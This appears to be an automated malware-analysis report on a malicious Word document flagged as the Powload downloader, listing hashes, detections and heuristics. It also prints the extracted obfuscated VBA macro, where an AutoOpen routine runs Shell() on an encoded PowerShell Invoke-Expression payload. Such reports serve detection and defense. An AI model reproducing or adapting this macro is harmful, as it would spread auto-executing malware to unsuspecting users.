Office (OLE) malware analysis — malicious · 63d44ddc7164565d

MALICIOUS

Office (OLE)

240.5 KB Created: 2018-06-29 21:57:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: 2b4ebffb24ce389c958ef81fc9673bd1 SHA-1: 9b45ba984d53206083606b2984eb633fb986bba2 SHA-256: 63d44ddc7164565d400424f93ad7bbd0f5d4f38e28297f3003294d4c7fe52532

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical indicator of execution, to likely download and execute a secondary payload. The presence of the 'Doc.Malware.Powload-6797938-0' ClamAV signature further confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Malware.Powload-6797938-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Powload-6797938-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11938 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11938 bytes
SHA-256: `4e227dd24e66e02fe0fb3e5e0b8aac11ef2390153ab7926dee403fefad3a3044`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "URjoPfY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "zSRJuHbAcactAL" Function iEMcrhL() On Error Resume Next rsaPiE = BzGYL = 95584 / nRERn + 54761 / ChrW(99946) / NrrZcL + ChrW(ujhCU) * 83893 + ChrB(58715 * CInt(tXrXaj) * 8263 - Hex(aKtcha)) + XXvHi - Int(YFbApE) * (rJdZI - KuwEZ) JIROj = iTTKfY - zPVSPX / (cirRhU + Oct(OQTaS) - 42256 + Log(VZGqs)) rjmmXwSGou = iHQYDj + Chr(cdzzABRzo + vbKeyP + SNumRid) + "owe" + "rs" LlGhd = oJDpc = 63478 / pbiRAh + 29547 / ChrW(28348) / DAjMC + ChrW(ipOcWG) * 47739 + ChrB(82552 * CInt(JndfK) * 20734 - Hex(rtljbq)) + GIcCv - Int(FwRBHi) * (azKbQ - FHNEjD) bJpaW = nhHTt - cISLV / (YjwArj + Oct(QqkBt) - 7444 + Log(wqGwIr)) BqjSfQ = nbmvr = 55368 / XIaRF + 30827 / ChrW(10831) / CjOPA + ChrW(mCVCi) * 93622 + ChrB(44483 * CInt(QiLTmd) * 28242 - Hex(FBbibi)) + fDbZmn - Int(EPPTB) * (QsNjo - ssGmdc) EbNoS = DXqzCX - BPdvET / (phMnut + Oct(qmZRwz) - 71918 + Log(Zrbwpz)) iEMcrhL = trhAatbiUqI + rjmmXwSGou + spmYowUEY + hlUBbn + SZfpmUd atKIC = cPKiJA = 21421 / OZtYk + 24960 / ChrW(71090) / iEazS + ChrW(mUHiin) * 12805 + ChrB(36353 * CInt(mqLOXO) * 67364 - Hex(waLKRh)) + FkQIL - Int(iDOlc) * (afVXRv - HhYwND) QdZGjV = jYtWzH - Dnzcu / (IJaCu + Oct(UZqjm) - 6052 + Log(LpFdH)) End Function Sub AutoOpen() On Error Resume Next HDrGc = TnaEu = 52381 / TfrGC + 43543 / ChrW(24825) / ANsrH + ChrW(swjwJ) * 79556 + ChrB(45059 * CInt(UQCwCa) * 51430 - Hex(UwFQkZ)) + iCHuo - Int(pwOUj) * (rtGklw - LaEEUm) Gtwmrj = bzvCu - jiRoiV / (izOLTS + Oct(Otiwm) - 16724 + Log(AwBcdz)) Application.Run "fJvGEi", iEMcrhL QwKhr = zjJQZ = 98231 / HGilSZ + 60387 / ChrW(8253) / TzPllj + ChrW(PLBYrS) * 7397 + ChrB(6484 * CInt(cDEhkO) * 46500 - Hex(WptRQK)) + REidN - Int(FdTzt) * (YbvoD - HpVaWz) ZcPvm = zBzGn - apMWak / (qKzMbA + Oct(pJUiqh) - 69469 + Log(opqhj)) End Sub Function fJvGEi(uikVYHzobA) On Error Resume Next uDbUHE = lvTvql = 14515 / ZPovzb + 80201 / ChrW(63116) / PFACB + ChrW(jtEEv) * 13013 + ChrB(46158 * CInt(TwNEOB) * 74339 - Hex(vciOa)) + ljEFW - Int(FCDaj) * (mCmhL - BXVwjX) fcOJXX = wfHUzq - LmRsnU / (OkONQr + Oct(CjnAh) - 56743 + Log(jqsfDw)) HvRiVD = lDFwDm = 32748 / AwHfbu + 97395 / ChrW(38036) / SNtcv + ChrW(NkYNH) * 79022 + ChrB(93119 * CInt(voWQch) * 8317 - Hex(rZrqwY)) + VhIbz - Int(IJOqi) * (LiYJDD - MrEdW) PoVTkE = oNDfwN - PniIaz / (swSQom + Oct(MfQEmp) - 65920 + Log(mqdlBD)) DVWhb = aoJRnhjtiM + Shell(WJscFz + uikVYHzobA + rdjaCzHDc, 600758591 - 600758591) + lYMDuhhIf bsLpFB = NwDYz = 44214 / CDwRzc + 64509 / ChrW(75005) / LYQnAn + ChrW(owluXa) * 9077 + ChrB(97883 * CInt(dnSTAO) * 85087 - Hex(lknhU)) + bQoRz - Int(pNYZS) * (bLcSc - zkToOT) zjEBQA = TsJdiI - hsQOt / (lmjiT + Oct(okkjm) - 3664 + Log(qCkkL)) End Function Function spmYowUEY() On Error Resume Next ZBGsik = tLSSmQ - bRDUcD / (DQiLwi + Oct(PDitIw) - 25390 + Log(GsdCAD)) sAuuFR = hjGBK = 47703 / jiuXa + 8791 / ChrW(87634) / lRHcD + ChrW(WziEfO) * 7496 + ChrB(2306 * CInt(PEfnjP) * 61655 - Hex(iazqnM)) + KUvlO - Int(mcNkLm) * (ziKOfp - TvQNrF) coZYHRT = "hell " + " iNVoKE-" + "expREsSI" + "On" + Chr(40) + " [sTR" + "Ing]::jo" + "In" + Chr(40) + "'', " uXPYLb = wZwKaQ - EXvAT / (ppIzHb + Oct(wlfFis) - 29101 + Log(rnMfqF)) rwsYB = dNsOCr = 41267 / XjjCtd + 15682 / ChrW(68453) / iUQAK + ChrW(qaDkk) * 46911 + ChrB(74378 * CInt(ahrmp) * 81684 - Hex(GErpjM)) + AHaKIW - Int(DlqSD) * (owGkN - NIUBrS) BtwmEMWn = Chr(40) + "'16,10" + "2e94&" + "92D9&90," + "81~67O25" + "D91O86" + "D94&8" + "1,87e64" + "{20-12" + "2O81{64" + "e26{" + "99~81s86s" + "119D88" OCwKz = IlZBX = 61164 / FPRRj + 57132 / ChrW(98740) / urbhB + ChrW(NjjVch) * 69657 + ChrB(52154 * CInt(Bwicq) * 168 - Hex(ELMLW)) + WvvNFt - Int(LUcwj) * (CpfvwT - JQUFAJ) omQVp = lNnaP - qGujUi / (vzQYPO + Oct(sSFbpM) - 93636 + Log(fYEHGP)) aJqvjk = "~93~" + "81e90&" + "64e15D16&" + "109O8" + "9s123e9R1" + "9~92 ... (truncated)

SHA-256: 4e227dd24e66e02fe0fb3e5e0b8aac11ef2390153ab7926dee403fefad3a3044

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "URjoPfY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zSRJuHbAcactAL"
Function iEMcrhL()
On Error Resume Next
rsaPiE = BzGYL = 95584 / nRERn + 54761 / ChrW(99946) / NrrZcL + ChrW(ujhCU) * 83893 + ChrB(58715 * CInt(tXrXaj) * 8263 - Hex(aKtcha)) + XXvHi - Int(YFbApE) * (rJdZI - KuwEZ)
JIROj = iTTKfY - zPVSPX / (cirRhU + Oct(OQTaS) - 42256 + Log(VZGqs))
rjmmXwSGou = iHQYDj + Chr(cdzzABRzo + vbKeyP + SNumRid) + "owe" + "rs"
LlGhd = oJDpc = 63478 / pbiRAh + 29547 / ChrW(28348) / DAjMC + ChrW(ipOcWG) * 47739 + ChrB(82552 * CInt(JndfK) * 20734 - Hex(rtljbq)) + GIcCv - Int(FwRBHi) * (azKbQ - FHNEjD)
bJpaW = nhHTt - cISLV / (YjwArj + Oct(QqkBt) - 7444 + Log(wqGwIr))
BqjSfQ = nbmvr = 55368 / XIaRF + 30827 / ChrW(10831) / CjOPA + ChrW(mCVCi) * 93622 + ChrB(44483 * CInt(QiLTmd) * 28242 - Hex(FBbibi)) + fDbZmn - Int(EPPTB) * (QsNjo - ssGmdc)
EbNoS = DXqzCX - BPdvET / (phMnut + Oct(qmZRwz) - 71918 + Log(Zrbwpz))
iEMcrhL = trhAatbiUqI + rjmmXwSGou + spmYowUEY + hlUBbn + SZfpmUd
atKIC = cPKiJA = 21421 / OZtYk + 24960 / ChrW(71090) / iEazS + ChrW(mUHiin) * 12805 + ChrB(36353 * CInt(mqLOXO) * 67364 - Hex(waLKRh)) + FkQIL - Int(iDOlc) * (afVXRv - HhYwND)
QdZGjV = jYtWzH - Dnzcu / (IJaCu + Oct(UZqjm) - 6052 + Log(LpFdH))
End Function
Sub AutoOpen()
On Error Resume Next
HDrGc = TnaEu = 52381 / TfrGC + 43543 / ChrW(24825) / ANsrH + ChrW(swjwJ) * 79556 + ChrB(45059 * CInt(UQCwCa) * 51430 - Hex(UwFQkZ)) + iCHuo - Int(pwOUj) * (rtGklw - LaEEUm)
Gtwmrj = bzvCu - jiRoiV / (izOLTS + Oct(Otiwm) - 16724 + Log(AwBcdz))
Application.Run "fJvGEi", iEMcrhL
QwKhr = zjJQZ = 98231 / HGilSZ + 60387 / ChrW(8253) / TzPllj + ChrW(PLBYrS) * 7397 + ChrB(6484 * CInt(cDEhkO) * 46500 - Hex(WptRQK)) + REidN - Int(FdTzt) * (YbvoD - HpVaWz)
ZcPvm = zBzGn - apMWak / (qKzMbA + Oct(pJUiqh) - 69469 + Log(opqhj))
End Sub
Function fJvGEi(uikVYHzobA)
On Error Resume Next
uDbUHE = lvTvql = 14515 / ZPovzb + 80201 / ChrW(63116) / PFACB + ChrW(jtEEv) * 13013 + ChrB(46158 * CInt(TwNEOB) * 74339 - Hex(vciOa)) + ljEFW - Int(FCDaj) * (mCmhL - BXVwjX)
fcOJXX = wfHUzq - LmRsnU / (OkONQr + Oct(CjnAh) - 56743 + Log(jqsfDw))
HvRiVD = lDFwDm = 32748 / AwHfbu + 97395 / ChrW(38036) / SNtcv + ChrW(NkYNH) * 79022 + ChrB(93119 * CInt(voWQch) * 8317 - Hex(rZrqwY)) + VhIbz - Int(IJOqi) * (LiYJDD - MrEdW)
PoVTkE = oNDfwN - PniIaz / (swSQom + Oct(MfQEmp) - 65920 + Log(mqdlBD))
DVWhb = aoJRnhjtiM + Shell(WJscFz + uikVYHzobA + rdjaCzHDc, 600758591 - 600758591) + lYMDuhhIf
bsLpFB = NwDYz = 44214 / CDwRzc + 64509 / ChrW(75005) / LYQnAn + ChrW(owluXa) * 9077 + ChrB(97883 * CInt(dnSTAO) * 85087 - Hex(lknhU)) + bQoRz - Int(pNYZS) * (bLcSc - zkToOT)
zjEBQA = TsJdiI - hsQOt / (lmjiT + Oct(okkjm) - 3664 + Log(qCkkL))
End Function

Function spmYowUEY()
On Error Resume Next
ZBGsik = tLSSmQ - bRDUcD / (DQiLwi + Oct(PDitIw) - 25390 + Log(GsdCAD))
sAuuFR = hjGBK = 47703 / jiuXa + 8791 / ChrW(87634) / lRHcD + ChrW(WziEfO) * 7496 + ChrB(2306 * CInt(PEfnjP) * 61655 - Hex(iazqnM)) + KUvlO - Int(mcNkLm) * (ziKOfp - TvQNrF)
coZYHRT = "hell " + " iNVoKE-" + "expREsSI" + "On" + Chr(40) + " [sTR" + "Ing]::jo" + "In" + Chr(40) + "'', "
uXPYLb = wZwKaQ - EXvAT / (ppIzHb + Oct(wlfFis) - 29101 + Log(rnMfqF))
rwsYB = dNsOCr = 41267 / XjjCtd + 15682 / ChrW(68453) / iUQAK + ChrW(qaDkk) * 46911 + ChrB(74378 * CInt(ahrmp) * 81684 - Hex(GErpjM)) + AHaKIW - Int(DlqSD) * (owGkN - NIUBrS)
BtwmEMWn = Chr(40) + "'16,10" + "2e94&" + "92D9&90," + "81~67O25" + "D91O86" + "D94&8" + "1,87e64" + "{20-12" + "2O81{64" + "e26{" + "99~81s86s" + "119D88"
OCwKz = IlZBX = 61164 / FPRRj + 57132 / ChrW(98740) / urbhB + ChrW(NjjVch) * 69657 + ChrB(52154 * CInt(Bwicq) * 168 - Hex(ELMLW)) + WvvNFt - Int(LUcwj) * (CpfvwT - JQUFAJ)
omQVp = lNnaP - qGujUi / (vzQYPO + Oct(sSFbpM) - 93636 + Log(fYEHGP))
aJqvjk = "~93~" + "81e90&" + "64e15D16&" + "109O8" + "9s123e9R1" + "9~92
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.